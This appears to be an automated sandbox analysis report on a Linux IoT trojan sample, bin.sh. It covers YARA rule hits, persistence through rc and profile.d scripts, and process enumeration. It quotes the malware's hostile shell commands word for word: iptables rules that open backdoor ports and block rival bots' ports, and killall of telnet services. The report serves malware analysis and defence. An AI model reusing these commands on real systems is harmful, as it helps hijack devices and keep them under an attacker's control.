                            Source: /tmp/bin.sh (PID: 6792)HTML file containing JavaScript created: /usr/networksJump to dropped file
                            Source: bin.sh, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                            Source: ELF static info symbol of initial sample.symtab present: no
                            Source: classification engineClassification label: mal100.spre.troj.evad.linSH@0/221@4/0

                            Persistence and Installation Behavior:

                            barindex
                            Sample tries to persist itself using System V runlevelsShow sources
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/rcS.d/S95baby.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/rc.localJump to behavior
                            Sample tries to persist itself using /etc/profileShow sources
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/apps-bin-path.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/Z97-byobu.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/bash_completion.shJump to behavior
                            Source: /tmp/bin.sh (PID: 6792)File: /etc/profile.d/vte-2.91.shJump to behavior
                            Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                            Source: /bin/sh (PID: 6827)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6857)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6863)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6913)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6935)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6948)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6973)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
                            Source: /bin/sh (PID: 6992)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                            Source: /bin/sh (PID: 6995)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                            Source: /bin/sh (PID: 6998)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                            Source: /bin/sh (PID: 7010)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                            Source: /bin/sh (PID: 7067)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                            Source: /bin/sh (PID: 7093)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                            Source: /bin/sh (PID: 7122)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                            Source: /bin/sh (PID: 7145)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                            Source: /bin/sh (PID: 7163)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                            Source: /bin/sh (PID: 7179)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                            Source: /bin/sh (PID: 7200)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                            Source: /bin/sh (PID: 7216)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                            Source: /bin/sh (PID: 7230)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                            Source: /bin/sh (PID: 7248)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                            Source: /bin/sh (PID: 7261)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                            Source: /bin/sh (PID: 7290)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                            Source: /bin/sh (PID: 7316)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7319)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7327)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7351)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7378)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7405)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7426)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
                            Source: /bin/sh (PID: 7439)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                            Source: /tmp/bin.sh (PID: 6792)File: /proc/6792/mountsJump to behavior
                            Terminates several processes with shell command 'killall'Show sources
                            Source: /bin/sh (PID: 6797)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                            Source: /tmp/bin.sh (PID: 6792)File written: /usr/networksJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6792)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh (PID: 6819)Reads from proc file: /proc/statJump to behavior
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/230/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/231/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/232/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/233/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/234/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3512/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/359/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1452/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3632/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3518/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/10/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1339/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/11/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/12/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/13/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/14/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/15/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/16/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/17/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/18/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/19/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/483/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3527/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3527/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/2/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3525/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1346/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3524/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3524/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/4/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3523/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/5/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/7/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/8/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/9/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/20/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/21/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/22/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/23/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/24/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/25/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/28/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/29/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1363/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1362/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/30/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1119/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3310/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/263/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/264/stat